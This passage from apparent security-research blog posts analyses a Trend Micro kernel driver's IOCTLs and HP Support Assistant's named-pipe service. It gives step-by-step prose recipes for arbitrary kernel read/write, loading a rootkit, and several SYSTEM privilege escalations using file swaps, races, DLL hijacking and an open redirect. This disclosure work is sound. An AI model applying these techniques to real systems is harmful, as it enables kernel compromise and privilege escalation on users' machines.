2723h	IoControlGetFileSecurity	Calls NtCreateFile and then ZwQuerySecurityObject. All parameters are controlled by the request.
2724h	IoControlSetFileSecurity	Calls NtCreateFile and then ZwSetSecurityObject. All parameters are controlled by the request.
2725h	IoControlQueryExclusiveHandle	Check if a file is opened exclusively.
2726h	IoControlCloseExclusiveHandle	Forcefully close a file handle.

IoControlCode == 90004027h

Discovery

This dispatch table is primarily used to control the driver's process scanning features. Many functions in this sub dispatch table use a separate scanning thread to synchronously search for processes via various methods both documented and undocumented.

OperationCode	PrimaryRoutine	Description
C350h	GetProcessesAllMethods	Find processes via ZwQuerySystemInformation and WorkingSetExpansionLinks.
C351h	DeleteTaskResults*	Delete results obtained through other functions like GetProcessesAllMethods.
C358h	GetTaskBasicResults*	Further parse results obtained through other functions like GetProcessesAllMethods.
C35Dh	GetTaskFullResults*	Completely parse results obtained through other functions like GetProcessesAllMethods.
C360h	IsSupportedSystem	Returns TRUE if the system is "supported" (whether or not they have hardcoded offsets for your build).
C361h	TryToStopTmComm	Attempt to stop the driver.
C362h	GetProcessesViaMethod	Find processes via a specified method.
C371h	CheckDeviceStackIntegrity	Check for tampering on devices associated with physical drives.
C375h	ShouldRequireOplock	Returns TRUE if oplocks should be used for certain scans.

These IOCTLs revolve around a few structures I call "MicroTask" and "MicroScan". Here are the structures reverse-engineered:

struct MicroTaskVtable
{
	PVOID Constructor;
	PVOID NewNode;
	PVOID DeleteNode;
	PVOID Insert;
	PVOID InsertAfter;
	PVOID InsertBefore;
	PVOID First;
	PVOID Next;
	PVOID Remove;
	PVOID RemoveHead;
	PVOID RemoveTail;
	PVOID unk2;
	PVOID IsEmpty;
};

struct MicroTask
{
	MicroTaskVtable* vtable;
	PVOID self1; // ptr to itself.
	PVOID self2; // ptr to itself.
	DWORD_PTR unk1;
	PVOID MemoryAllocator;
	PVOID CurrentListItem;
	PVOID PreviousListItem;
	DWORD ListSize;
	DWORD unk4; // Initialized as NULL.
	char ListName[50];
};

struct MicroScanVtable
{
	PVOID Constructor;
	PVOID GetTask;
};

struct MicroScan
{
	MicroScanVtable* vtable;
	DWORD Tag; // Always 'PANS'.
	char pad1[4];
	DWORD64 TasksSize;
	MicroTask Tasks[4];
};

For most of the IOCTLs in this sub dispatch table, a MicroScan is passed in by the client which the driver populates. We'll look into how we can abuse this trust in the next section.

Exploitation

When I was initially reverse engineering the functions in this sub dispatch table, I was quite confused because the code "didn't seem right". It appeared like the MicroScan kernel pointer returned by functions such as GetProcessesAllMethods was being directly passed onto other functions such as DeleteTaskResults by the client. These functions would then take this untrusted kernel pointer and with almost no validation call functions in the virtual function table specified at the base of the class.

Taking a look at the "validation routine" for the DeleteTaskResults sub dispatch table entry, the only validation performed on the MicroScan instance specified at the input buffer + 0x10 was making sure it was a valid kernel address.

The only other check besides making sure that the supplied pointer was in kernel memory was a simple check in DeleteTaskResults to make sure the Tag member of the MicroScan is PANS.

Since DeleteTaskResults calls the constructor specified in the virtual function table of the MicroScan instance, to call an arbitrary kernel function we need to:

Be able to allocate at least 10 bytes of kernel memory (for vtable and tag).
Control the allocated kernel memory to set the virtual function table pointer and the tag.
Be able to determine the address of this kernel memory from user-mode.

Fortunately a mentor of mine, Alex Ionescu, was able to point me in the right direction when it comes to allocating and controlling kernel memory from user-mode. A HackInTheBox Magazine from 2010 had an article by Matthew Jurczyk called "Reserve Objects in Windows 7". This article discussed using APC Reserve Objects, which was introduced in Windows 7, to allocate controllable kernel memory from user-mode. The general idea is that you can queue an Apc to an Apc Reserve Object with the ApcRoutine and ApcArgumentX members being the data you want in kernel memory and then use NtQuerySystemInformation to find the Apc Reserve Object in kernel memory. This reserve object will have the previously specified KAPC variables in a row, allowing a user-mode application to control up to 32 bytes of kernel memory (on 64-bit) and know the location of the kernel memory. I would strongly suggest reading the article if you'd like to learn more.

This trick still works in Windows 10, meaning we're able to meet all three requirements. By using an Apc Reserve Object, we can allocate at least 10 bytes for the MicroScan structure and bypass the inadequate checks completely. The result? The ability to call arbitrary kernel pointers:

Although I provided a specific example of vulnerable code in DeleteTaskResults, any of the functions I marked in the table with asterisks are vulnerable. They all trust the kernel pointer specified by the untrusted client and end up calling a function in the MicroScan instance's virtual function table.

IoControlCode == 90004033h

Discovery

This next sub dispatch table primarily manages the TrueApi class we reviewed before.

OperationCode	PrimaryRoutine	Description
EA60h	IoControlGetTrueAPIPointer	Retrieve pointers of functions in the TrueApi class.
EA61h	IoControlGetUtilityAPIPointer	Retrieve pointers of utility functions of the driver.
EA62h	IoControlRegisterUnloadNotify*	Register a function to be called on unload.
EA63h	IoControlUnRegisterUnloadNotify	Unload a previously registered unload function.

Exploitation

IoControlRegisterUnloadNotify

This function caught my eye the moment I saw its name in a debug string. Using this sub dispatch table function, an untrusted client can register up to 16 arbitrary "unload routines" that get called when the driver unloads. This function's validator routine checks this pointer from the untrusted client buffer for validity. If the caller is from user-mode, the validator calls ProbeForRead on the untrusted pointer. If the caller is from kernel-mode, the validator checks that it is a valid kernel memory address.

This function cannot immediately be used in an exploit from user-mode. The problem is that if we're a user-mode caller, we must provide a user-mode pointer, because the validator routine uses ProbeForRead. When the driver unloads, this user-mode pointer gets called, but it won't do much because of mitigations such as SMEP. I'll reference this function in a later section, but it is genuinely scary to see an untrusted user-mode client being able to direct a driver to call an arbitrary pointer by design.

IoControlCode == 900040DFh

This sub dispatch table is used to interact with the XrayApi. Although the Xray Api is generally used by scans implemented in the kernel, this sub dispatch table provides limited access for the client to interact with physical drives.

OperationCode	PrimaryRoutine	Description
15F90h	IoControlReadFile	Read a file directly from a disk.
15F91h	IoControlUpdateCoreList	Update the kernel pointers used by the Xray Api.
15F92h	IoControlGetDRxMapTable	Get a table of drives mapped to their corresponding devices.

IoControlCode == 900040E7h

Discovery

The final sub dispatch is used to scan for hooks in a variety of system structures. It was interesting to see the variety of hooks Trend Micro checks for including hooks in object types, major function tables, and even function inline hooks.

OperationCode	PrimaryRoutine	Description
186A0h	TMXMSCheckSystemRoutine	Check a few system routines for hooks.
186A1h	TMXMSCheckSystemFileIO	Check file IO major functions for hooks.
186A2h	TMXMSCheckSpecialSystemHooking	Check the file object type and ntoskrnl Io functions for hooks.
186A3h	TMXMSCheckGeneralSystemHooking	Check the Io manager for hooks.
186A4h	TMXMSCheckSystemObjectByName	Recursively trace a system object (either a directory or symlink).
186A5h	TMXMSCheckSystemObjectByName2*	Copy a system object into user-mode memory.

Exploitation

Yeah, TMXMSCheckSystemObjectByName2 is as bad as it sounds. Before looking at the function directly, here's a few reverse engineered structures used later:

struct CheckSystemObjectParams
{
    PVOID Src;
    PVOID Dst;
    DWORD Size;
    DWORD* OutSize;
};

struct TXMSParams
{
    DWORD OutStatus;
    DWORD HandlerID;
    CHAR unk[0x38];
    CheckSystemObjectParams* CheckParams;
};

TMXMSCheckSystemObjectByName2 takes in a Source pointer, Destination pointer, and a Size in bytes. The validator function called for TMXMSCheckSystemObjectByName2 checks the following:

ProbeForRead on the CheckParams member of the TXMSParams structure.
ProbeForRead and ProbeForWrite on the Dst member of the CheckSystemObjectParams structure.

Essentially, this means that we need to pass a valid CheckParams structure and the Dst pointer we pass is in user-mode memory. Now let's look at the function itself:

Although that for loop may seem scary, all it is doing is an optimized method of checking a range of kernel memory. For every memory page in the range Src to Src + Size, the function calls MmIsAddressValid. The real scary part is the following operations:

These lines take an untrusted Src pointer and copies Size bytes to the untrusted Dst pointer... yikes. We can use the memmove operations to read an arbitrary kernel pointer, but what about writing to an arbitrary kernel pointer? The problem is that the validator for TMXMSCheckSystemObjectByName2 requires that the destination is user-mode memory. Fortunately, there is another bug in the code.

The next *params->OutSize = Size; line takes the Size member from our structure and places it at the pointer specified by the untrusted OutSize member. No verification is done on what OutSize points to, thus we can write up to a DWORD each IOCTL call. One caveat is that the Src pointer would need to point to valid kernel memory for up to Size bytes. To meet this requirement, I just passed the base of the ntoskrnl module as the source.

Using this arbitrary write primitive, we can use the previously found unload routines trick to execute code. Although the validator routine prevents us from passing in a kernel pointer if we're calling from user-mode, we don't actually need to go through the validator. Instead, we can write to the unload routine array inside of the driver's .data section using our write primitive and place the pointer we want.

Really, really bad code

Typically, I like sticking to strictly security in my blog posts, but this driver made me break that tradition. In this section, we won't be covering the security issues of the driver, rather the terrible code that's used by millions of Trend Micro customers around the world.

Bruteforcing Processes

Let's take a look at what's happening here. This function has a for loop from 0 to 0x10000, incrementing by 4, and retrieves the object of the process behind the current index (if there is one). If the index does match a process, the function checks if the name of the process is csrss.exe. If the process is named csrss.exe, the final check is that the session ID of the process is 0. Come on guys, there is literally documented API to enumerate processes from kernel... what's the point of bruteforcing?

Bruteforcing Offsets

EPROCESS ImageFileName Offset

When I first saw this code, I wasn't sure what I was looking at. The function takes the current process, which happens to be the System process since this is called in a System thread, then it searches for the string "System" in the first 0x1000 bytes. What's happening is... Trend Micro is bruteforcing the ImageFileName member of the EPROCESS structure by looking for the known name of the System process inside of its EPROCESS structure. If you wanted the ImageFileName of a process, just use ZwQueryInformationProcess with the ProcessImageFileName class...

EPROCESS Peb Offset

In this function, Trend Micro uses the PID of the csrss process to brute force the Peb member of the EPROCESS structure. The function retrieves the EPROCESS object of the csrss process by using PsLookupProcessByProcessId and it retrieves the PebBaseAddress by using ZwQueryInformationProcess. Using those pointers, it tries every offset from 0 to 0x2000 that matches the known Peb pointer. What's the point of finding the offset of the Peb member when you can just use ZwQueryInformationProcess, as you already do...

ETHREAD StartAddress Offset

Here Trend Micro uses the current system thread with a known start address to brute force the StartAddress member of the ETHREAD structure. Another case where finding the raw offset is unnecessary. There is a semi-documented class of ZwQueryInformationThread called ThreadQuerySetWin32StartAddress which gives you the start address of a thread.

Unoptimized Garbage

When I initially decompiled this function, I thought IDA Pro might be simplifying a memset operation, because all this function was doing was setting all of the TrueApi structure members to zero. I decided to take a peek at the assembly to confirm I wasn't missing something...

Yikes... looks like someone turned off optimizations.

Cheating Microsoft's WHQL Certification

So far we've covered methods to read and write arbitrary kernel memory, but there is one step missing to install our own rootkit. Although you could execute kernel shellcode with just a read/write primitive, I generally like finding the path of least resistance. Since this is a third-party driver, chances are, there is some NonPagedPool memory allocated which we can use to host and execute our malicious shellcode.

Let's take a look at how Trend Micro allocates memory. Early in the entrypoint of the driver, Trend Micro checks if the machine is a "supported system" by checking the major version, minor version, and the build number of the operating system. Trend Micro does this because they hardcode several offsets which can change between builds.

Fortunately, the PoolType global variable which is used to allocate non-paged memory is set to 0 (NonPagedPool) by default. I noticed that although this value was 0 initially, the variable was still in the .data section, meaning it could be changed. When I looked at what wrote to the variable, I saw that the same function responsible for checking the operating system's version also set this PoolType variable in certain cases.

From a brief glance, it looked like if our operating system is Windows 10 or a newer version, the driver prefers to use NonPagedPoolNx. Good from a security standpoint, but bad for us. This is used for all non-paged allocations, meaning we would have to find a spare ExAllocatePoolWithTag that had a hardcoded NonPagedPool argument otherwise we couldn't use the driver's allocated memory on Windows 10. But, it's not that straightforward. What about MysteriousCheck(), the second requirement for this if statement?

What MysteriousCheck() was doing was checking if Microsoft's Driver Verifier was enabled... Instead of just using NonPagedPoolNx on Windows 8 or higher, Trend Micro placed an explicit check to only use secure memory allocations if they're being watched. Why is this not just an example of bad code? Trend Micro's driver is WHQL certified:

Passing Driver Verifier has been a long-time requirement of obtaining WHQL certification. On Windows 10, Driver Verifier enforces that drivers do not allocate executable memory. Instead of complying with this requirement designed to secure Windows users, Trend Micro decided to ignore their user's security and designed their driver to cheat any testing or debugging environment which would catch such violations.

Honestly, I'm dumbfounded. I don't understand why Trend Micro would go out of their way to cheat in these tests. Trend Micro could have just left the Windows 10 check, why would you even bother creating an explicit check for Driver Verifier? The only working theory I have is that for some reason most of their driver is not compatible with NonPagedPoolNx and that only their entrypoint is compatible, otherwise there really isn't a point.

Delivering on my promise

As I promised, you can use Trend Micro's driver to install your own rootkit. Here is what you need to do:

Find any NonPagedPool allocation by the driver. As long as you don't have Driver Verifier running, you can use any of the non-paged allocations that have their pointers stored in the .data section. Preferably, pick an allocation that isn't used often.
Write your kernel shellcode anywhere in the memory allocation using the arbitrary kernel write primitive in TMXMSCheckSystemObjectByName2.
Execute your shellcode by registering an unload routine (directly in .data) or using the several other execution methods present in the 90004027h dispatch table.

It's really as simple as that.

Conclusion

I reverse a lot of drivers and you do typically see some pretty dumb stuff, but I was shocked at many of the findings in this article coming from a company such as Trend Micro. Most of the driver feels like proof-of-concept garbage that is held together by duct tape.

Although Trend Micro has taken basic precautionary measures such as restricting who can talk to their driver, a significant amount of the code inside of the IOCTL handlers includes very risky DKOM. Also, I'm not sure how certain practices such as bruteforcing anything would get through adequate code review processes. For example, the Bruteforcing Processes code doesn't make sense, are Trend Micro developers not aware of enumerating processes via ZwQuerySystemInformation? What about disabling optimizations? Anti-virus already gets flak for slowing down client machines, why would you intentionally make your driver slower? To add insult to injury, this driver is used in several Trend Micro products, not just their rootkit remover. All I know going forward is that I won't be a Trend Micro customer anytime soon.

Several Critical Vulnerabilities on most HP machines running Windows

Bill Demirkapi — Fri, 03 Apr 2020 12:31:00 GMT

I always have considered bloatware a unique attack surface. Instead of the vulnerability being introduced by the operating system, it is introduced by the manufacturer that you bought your machine from. More tech-savvy folk might take the initiative and remove the annoying software that came with their machine, but will an average consumer? Pre-installed bloatware is the most interesting, because it provides a new attack surface impacting a significant number of users who leave the software on their machines.

For the past year, I've been researching bloatware created by popular computer manufacturers such as Dell and Lenovo. Some of the vulnerabilities I have published include the Remote Code Execution and the Local Privilege Escalation vulnerability I found in Dell's own pre-installed bloatware. More often then not, I have found that this class of software has little-to-no security oversight, leading to poor code quality and a significant amount of security issues.

In this blog post, we'll be looking at HP Support Assistant which is "pre-installed on HP computers sold after October 2012, running Windows 7, Windows 8, or Windows 10 operating systems". We'll be walking through several vulnerabilities taking a close look at discovering and exploiting them.

General Discovery

Before being able to understand how each vulnerability works, we need to understand how HP Support Assistant works on a conceptual level. This section will document the background knowledge needed to understand every vulnerability in this report except for the Remote Code Execution vulnerability.

Opening a few of the binaries in dnSpy revealed that they were "packed" by SmartAssembly. This is an ineffective attempt at security through obscurity as de4dot quickly deobfuscated the binaries.

On start, HP Support Assistant will begin hosting a "service interface" which exposes over 250 different functions to the client. This contract interface is exposed by a WCF Net Named Pipe for access on the local system. In order for a client to connect to the interface, the client creates a connection to the interface by connecting to the pipe net.pipe://localhost/HPSupportSolutionsFramework/HPSA.

This is not the only pipe created. Before a client can call on any of the useful methods in the contract interface, it must be "validated". The client does this by calling on the interface method StartClientSession with a random string as the first argument. The service will take this random string and start two new pipes for that client.

The first pipe is called \\.\pipe\Send_HPSA_[random string] and the second is called \\.\pipe\Receive_HPSA_[random string]. As the names imply, HP uses two different pipes for sending and receiving messages.

After creating the pipes, the client will send the string "Validate" to the service. When the service receives any message over the pipe except "close", it will automatically validate the client – regardless of the message contents ("abcd" will still cause validation).

The service starts by obtaining the process ID of the process it is communicating with using GetNamedPipeClientProcessId on the pipe handle. The service then grabs the full image file name of the process for verification.

The first piece of verification is to ensure that the "main module" property of the C# Process object equals the image name returned by GetProcessImageFileName.

The second verification checks that the process file is not only signed, but the subject of its certificate contains hewlett-packard, hewlett packard, or o=hp inc.

The next verification checks the process image file name for the following:

The process path is "rooted" (not a relative path).
The path does not start with \.
The path does not contain ...
The path does not contain .\.
The path is not a reparse or junction point.

The last piece of client verification is checking that each parent process passes the previous verification steps AND starts with:

C:\Program Files[ (x86)]
C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\
C:\Program Files[ (x86)]\Hewlett Packard\HP Support Solutions\
or C:\Windows (excluding C:\Windows\Temp)

If you pass all of these checks, then your "client session" is added to a list of valid clients. A 4-byte integer is generated as a "client ID" which is returned to the client. The client can obtain the required token for calling protected methods by calling the interface method GetClientToken and passing the client ID it received earlier.

One extra check done is on the process file name. If the process file name is either:

C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\HPSF.exe
C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\Resources\ProductConfig.exe
C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\Resources\HPSFViewer.exe

Then your token is added to a list of "trusted tokens". Using this token, the client can now call certain protected methods.

Before we head into the next section, there is another key design concept important to understanding almost all of the vulnerabilities. In most of the "service methods", the service often accepts several parameters about an "action" to take via a structure called the ActionItemBase. This structure has several pre-defined properties for a variety of methods that is set by the client. Anytime you see a reference to an "action item base property", understand that this property is under the complete control of an attacker.

In the following sections, we’ll be looking at several vulnerabilities found and the individual discovery/exploitation process for each one.

General Exploitation

Before getting into specific exploits, being able to call protected service methods is our number one priority. Most functions in the WCF Service are "protected", which means we will need to be able to call these functions to maximize the potential attack surface. Let’s take a look at some of the mitigations discussed above and how we can bypass them.

A real issue for HP is that the product is insecure by design. There are mitigations which I think serve a purpose, such as the integrity checks mentioned in the previous section, but HP is really fighting a battle they’ve already lost. This is because core components, such as the HP Web Product Detection rely on access to the service and run in an unprivileged context. The fact is, the current way the HP Service is designed, the service must be able to receive messages from unprivileged processes. There will always be a way to talk to the service as long as unprivileged processes are able to talk to the service.

The first choice I made is adding the HP.SupportFramework.ServiceManager.dll binary as a reference to my C# proof-of-concept payload because rewriting the entire client portion of the service would be a significant waste of time. There were no real checks in the binary itself and even if there were, it wouldn't have matter because it was a client-side DLL I controlled. The important checks are on the "server" or service side which handles incoming client connections.

The first important check to bypass is the second one where the service checks that our binary is signed by an HP certificate. This is simple to bypass because we can just fake being an HP binary. There are many ways to do this (i.e Process Doppleganging), but the route I took was starting a signed HP binary suspended and then injecting my malicious C# DLL. This gave me the context of being from an HP Program because I started the signed binary at its real path (in Program Files x86, etc).

To bypass the checks on the parent processes of the connecting client process, I opened a PROCESS_CREATE_PROCESS handle to the Windows Explorer process and used the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute to spoof the parent process.

Feel free to look at the other mitigations, this method bypasses all of them maximizing the attack surface of the service.

Local Privilege Escalation Vulnerabilities

Discovery: Local Privilege Escalation #1 to #3

Before getting into exploitation, we need to review context required to understand each vulnerability.

Let’s start with the protected service method named InstallSoftPaq. I don’t really know what "SoftPaq" stands for, maybe software package? Regardless, this method is used to install HP updates and software.

The method takes three arguments. First is an ActionItemBase object which specifies several details about what to install. Second is an integer which specifies the timeout for the installer that is going to be launched. Third is a Boolean indicating whether or not to install directly, it has little to no purpose because the service method uses the ActionItemBase to decide if it's installing directly.

The method begins by checking whether or not the action item base ExecutableName property is empty. If it is, the executable name will be resolved by concatenating both the action item base SPName property and .exe.

If the action item base property SilentInstallString is not empty, it will take a different route for executing the installer. This method is assumed to be the "silent install" method whereas the other one is a direct installer.

Silent Install

When installing silently, the service will first check if an Extract.exe exists in C:\Windows\TEMP. If the file does exist, it compares the length of the file with a trusted Extract binary inside HP's installation directory. If the lengths do not match, the service will copy the correct Extract binary to the temporary directory.

The method will then check to make sure that C:\Windows\TEMP + the action item base property ExecutableName exists as a file. If the file does exist, the method will ensure that the file is signed by HP (see General Discovery for a detailed description of the verification).

If the SilentInstallString property of the action item base contains the SPName property + .exe, the current directory for the new process will be the temporary directory. Otherwise, the method will set the current directory for the new process to C:\swsetup\ + the ExecutableName property.

Furthermore, if the latter, the service will start the previously copied Extract.exe binary and attempt to extract the download into current directory + the ExecutableName property after stripping .exe from the string. If the extraction folder already exists, it is deleted before execution. When the Extract.exe binary has finished executing, the sub-method will return true. If the extraction method returns false, typically due to an exception that occurred, the download is stopped in its tracks.

After determining the working directory and extracting the download if necessary, the method splits the SilentInstallString property into an array using a double quote as the delimiter.

If the silent install split array has a length less than 2, the installation is stopped in its tracks with an error indicating that the silent install string is invalid. Otherwise, the method will check if the second element (index 1) of the split array contains .exe, .msi, or .cmd. If it does not, the installation is stopped.

The method will then take the second element and concatenate it with the previously resolved current directory + the executable name with .exe stripped + \ + the second element. For example, if the second element was cat.exe and the executable name property was cats, the resolved path would be the current directory + \cats\cat.exe. If this resolved path does not exist, the installation stops.

If you passed the previous checks and the resolved path exists, the binary pointed to by the resolved path is executed. The arguments passed to the binary is the silent install string, however, the resolved path is removed from it. The installation timeout (minutes) is dictated by the second argument passed to InstallSoftPaq.

After the binary has finished executing or been terminated for passing the timeout period, the method returns the status of the execution and ends.

Direct Install

When no silent install string is provided, a method named StartInstallSoftpaqsDirectly is executed.

The method will then check to make sure that the result of the Path.Combine method with C:\Windows\TEMP and the action item base property ExecutableName as arguments exists as a file. If the file does not exist, the method stops and returns with a failure. If the file does exist, the method will ensure that the file is signed by HP (see General Discovery for a detailed description of the verification).

The method will then create a new scheduled task for the current time. The task is set to be executed by the Administrators group and if an Administrator is logged in, the specified program is executed immediately.

Exploitation: Local Privilege Escalation #1 to #3

Local Privilege Escalation #1

The first simple vulnerability causing Local Privilege Escalation is in the silent install route of the exposed service method named InstallSoftPaq. Quoting the discovery portion of this section,

When installing silently, the service will first check if an Extract.exe exists in C:\Windows\TEMP. If the file does exist, it compares the length of the file with a trusted Extract binary inside HP's installation directory. If the lengths do not match, the service will copy the correct Extract binary to the temporary directory.

This is where the bug lies. Unprivileged users can write to C:\Windows\TEMP, but cannot enumerate the directory (thanks Matt Graeber!). This allows an unprivileged attacker to write a malicious binary named Extract.exe to C:\Windows\TEMP, appending enough NULL bytes to match the size of the actual Extract.exe in HP's installation directory.

Here are the requirements of the attacker-supplied action item base:

The action item base property SilentInstallString must be defined to something other than an empty string.
The temporary path (C:\Windows\TEMP) + the action item base property ExecutableName must be a real file.
This file must also be signed by HP.
The action item base property SilentInstallString must not contain the value of the property SPName + .exe.

If these requirements are passed, when the method attempts to start the extractor, it will start our malicious binary as NT AUTHORITY\SYSTEM achieving Local Privilege Escalation.

Local Privilege Escalation #2

The second Local Privilege Escalation vulnerability again lies in the silent install route of the exposed service method named InstallSoftPaq. Let’s review what requirements we need to pass in order to have the method start our malicious binary.

The action item base property SilentInstallString must be defined to something other than an empty string.
The temporary path (C:\Windows\TEMP) + the action item base property ExecutableName must be a real file.
This file must also be signed by HP.
If the SPName property + .exe is in the SilentInstallString property, the current directory is C:\Windows\TEMP. Otherwise, the current directory is C:\swsetup\ + the ExecutableName property with .exe stripped. The resulting path does not need to exist.
The action item base property SilentInstallString must have at least one double quote.
The action item base property SilentInstallString must have a valid executable name after the first double quote (i.e a valid value could be something"cat.exe). This executable name is the "binary name".
The binary name must contain .exe or .msi.
The file at current directory + \ + the binary name must exist.

If all of these requirements are passed, the method will execute the binary at current directory + \ + binary name.

The eye-catching part about these requirements is that we can cause the "current directory", where the binary gets executed, to be in a directory path that can be created with low privileges. Any user is able to create folders in the C:\ directory, therefore, we can create the path C:\swsetup and have the current directory be that.

We need to make sure not to forget that the executable name has .exe stripped from it and this directory is created within C:\swsetup. For example, if we pass the executable name as dog.exe, we can have the current directory be C:\swsetup\dog. The only requirement if we go this route is that the same executable name exists in C:\Windows\TEMP. Since unprivileged users can write into the C:\Windows\TEMP directory, we simply can write a dog.exe into the directory and pass the first few checks. The best part is, the binary in the temp directory does not need to be the same binary in the C:\swsetup\dog directory. This means we can place a signed HP binary in the temp directory and a malicious binary in our swsetup directory.

A side-effect of having swsetup as our current directory is that the method will first try to "extract" the file in question. In the process of extracting the file, the method first checks if the swsetup directory exists. If it does, it deletes it. This is perfect for us, because we can easily tell when the function is almost at executing allowing us to quickly copy the malicious binary after re-creating the directory.

After extraction is attempted and after we place our malicious binary, the method will grab the filename to execute by grabbing the string after the first double quote character in the SilentInstallString parameter. This means if we set the parameter to be a"BadBinary.exe, the complete path for execution will be the current directory + BadBinary.exe. Since our current directory is C:\swsetup\dog, the complete path to the malicious binary becomes C:\swsetup\dog\BadBinary.exe. The only check on the file specified after the double quote is that it exists, there are no signature checks.

Once the final path is determined, the method starts the binary. For us, this means our malicious binary is executed.
To review the example above:

We place a signed HP binary named dog.exe in C:\Windows\TEMP.
We create the directory chain C:\swsetup\dog.
We pass in an action item base with the ExecutableName property set to dog.exe, the SPName property set to anything but BadBinary, and the SilentInstallString property set to a"BadBinary.exe.
We monitor the C:\swsetup\dog directory until it is deleted.
Once we detect that the dog folder is deleted, we immediately recreate it and copy in our BadBinary.exe.
Our BadBinary.exe gets executed with SYSTEM permissions.

Local Privilege Escalation #3

The next Local Privilege Escalation vulnerability is accessible by both the previous protected method InstallSoftpaq and InstallSoftpaqDirectly. This exploit lies in the previously mentioned direct install method.

This method starts off similarly to its silent install counterpart by concatenating C:\Windows\TEMP and the action item base ExecutableName property. Again similarly, the method will verify that the path specified is a binary signed by HP. The mildly interesting difference here is that instead of doing an unsafe concatenation operation by just adding the two strings using the + operator, the method uses Path.Combine, the safe way to concatenate path strings.

Path.Combine is significantly safer than just adding two path strings because it checks for invalid characters and will throw an exception if one is detected, halting most path manipulation attacks.

What this means for us as an attacker is that our ExecutableName property cannot escape the C:\Windows\TEMP directory, because / is one of the blacklisted characters.

This isn’t a problem, because unprivileged processes CAN write directly to C:\Windows\TEMP. This means we can place a binary to run right into the TEMP directory and have this method eventually execute it. Here’s the small issue with that, the HP Certificate check.

How do we get past that? We can place a legitimate HP binary into the temporary directory for execution, but we need to somehow hijack its context. In the beginning of this report, we outlined how we can enter the context of a signed HP binary by injecting into it, this isn’t exactly possible here because the service is the one creating the process. What we CAN do is some simple DLL Hijacking.

DLL Hijacking means we place a dynamically loaded library that is imported by the binary into the current directory of the signed binary. One of the first locations Windows searches when loading a dynamically linked library is the current directory. When the signed binary attempts to load that library, it will load our malicious DLL and give us the ability to execute in its context.

I picked at random from the abundant supply of signed HP binaries. For this attack, I went with HPWPD.exe which is HP’s "Web Products Detection" binary. A simple way to find a candidate DLL to hijack is by finding the libraries that are missing. How do we find "missing" dynamically loaded libraries? Procmon to the rescue!

Using three simple filters and then running the binary, we’re able to easily determine a missing library.

Now we have a few candidates here. C:\VM is the directory where the binary resides on my test virtual machine. Since the first path is not in the current directory, we can disregard that. From there on, we can see plenty of options. Each one of those CreateFile operations usually mean that the binary was attempting to load a dynamically linked library and was checking the current directory for it. For attacking purposes, I went with RichEd20.dll just because it's the first one I saw.

To perform this Local Privilege Escalation attack, all we have to do is write a malicious DLL, name it RichEd20.dll, and stick it with the binary in C:\Windows\TEMP. Once we call the direct install method passing the HPWPD.exe binary as the ExecutableName property, the method will start it as the SYSTEM user and then the binary will load our malicious DLL escalating our privileges.

Discovery: Local Privilege Escalation #4

The next protected service method to look at is DownloadSoftPaq.

To start with, this method takes in an action item base, a String parameter called MD5URL, and a Boolean indicating whether or not this is a manual installation. As an attacker, we control all three of these parameters.

If we pass in true for the parameter isManualInstall AND the action item base property UrlResultUI is not empty, we’ll use this as the download URL. Otherwise, we’ll use the action item base property UrlResult as the download URL. If the download URL does not start with http, the method will force the download URL to be http://.

This is an interesting check. The method will make sure that the Host of the specified download URL ends with either .hp.com OR .hpicorp.net. If this Boolean is false, the download will not continue.

Another check is making a HEAD request to the download URL and ensuring the response header Content-Length is greater than 0. If an invalid content length header is returned, the download won’t continue.

The location of the download is the combination of C:\Windows\TEMP and the action item base ExecutableName property. The method does not use safe path concatenation and instead uses raw string concatenation. After verifying that there is internet connection, the content length of the download URL is greater than 0, and the URL is "valid", the download is initiated.

If the action item base ActionType property is equal to "PrinterDriver", the method makes sure the downloaded file’s MD5 hash equals that specified in the CheckSum property or the one obtained from HP’s CDN server.

After the file has completed downloading, the final verification step is done. The VerifyDownloadSignature method will check if the downloaded file is signed. If the file is not signed and the shouldDelete argument is true, the method will delete the downloaded file and return that the download failed.

Exploitation: Local Privilege Escalation #4

Let’s say I wanted to abuse DownloadSoftPaq to download my file to anywhere in the system, how could I do this?

Let’s take things one at a time, starting with the first challenge, the download URL. Now the only real check done on this URL is making sure the host of the URL http://[this part]/something ENDS with .hp.com or .hpicorp.net. As seen in the screenshot of this check above, the method takes the safe approach of using C#’s URI class and grabbing the host from there instead of trying to parse it out itself. This means unless we can find a "zero day" in C#’s parsing of host names, we’ll need to approach the problem a different way.

Okay, so our download URL really does need to end with an HP domain. DNS Hijacking could be an option, but since we’re going after a Local Privilege Escalation bug, that would be pretty lame. How about this… C# automatically follows redirects, so what if we found an open redirect bug in any of the million HP websites? Time to use one of my "tricks" of getting a web bug primitive.

Sometimes I need a basic exploit primitive like an open redirect vulnerability or a cross site scripting vulnerability but I’m not really in the mood to pentest, what can I do? Let me introduce you to a best friend for an attacker, "OpenBugBounty"! OpenBugBounty is a site where random researchers can submit web bugs about any website. OpenBugBounty will take these reports and attempt to email several security emails at the vulnerable domain to report the issue. After 90 days from the date of submission, these reports are made public.

So I need an open redirect primitive, how can I use OpenBugBounty to find one? Google it!

Nice, we got a few options, let’s look at the first one.

An unpatched bug, just what we wanted. We can test the open redirect vulnerability by going to a URL like https://ers.rssx.hp.com/ers/redirect?targetUrl=https://google.com and landing on Google, thanks TvM and HP negligence (it's been 5 months since I re-reported this open redirect bug and it's still unpatched)!

Back to the method, this open redirect bug is on the host ers.rssx.hp.com which does end in .hp.com making it a perfect candidate for an attack. We can redirect to our own web server where the file is stored to make the method download any file we want.

The next barrier is being able to place the file where we want. This is pretty simple, because HP didn’t do safe path string concatenation. We can just set the action item base ExecutableName property to be a relative path such as ../../something allowing us to easily control the download location.

We don’t have to worry about MD5 verification if we just pass something other than "PrinterDriver" for the ActionType property.

The final check is the verification of the downloaded file’s signature. Let’s quickly look review the method.

If the file is not signed and the shouldDelete argument is true, the method will delete the downloaded file and return that the download failed.

The shouldDelete argument is the first argument passed to the VerifyDownloadSignature method. I didn’t want to spoil it in discovery, but this is hilarious because as you can see in the picture above, the first argument to VerifyDownloadSignature is always false. This means that even if the downloaded file fails signature verification, since shouldDelete is always false, the file won’t be deleted. I really don’t know how to explain this one… did an HP Developer just have a brain fart? Whatever the reason, it made my life a whole lot easier.

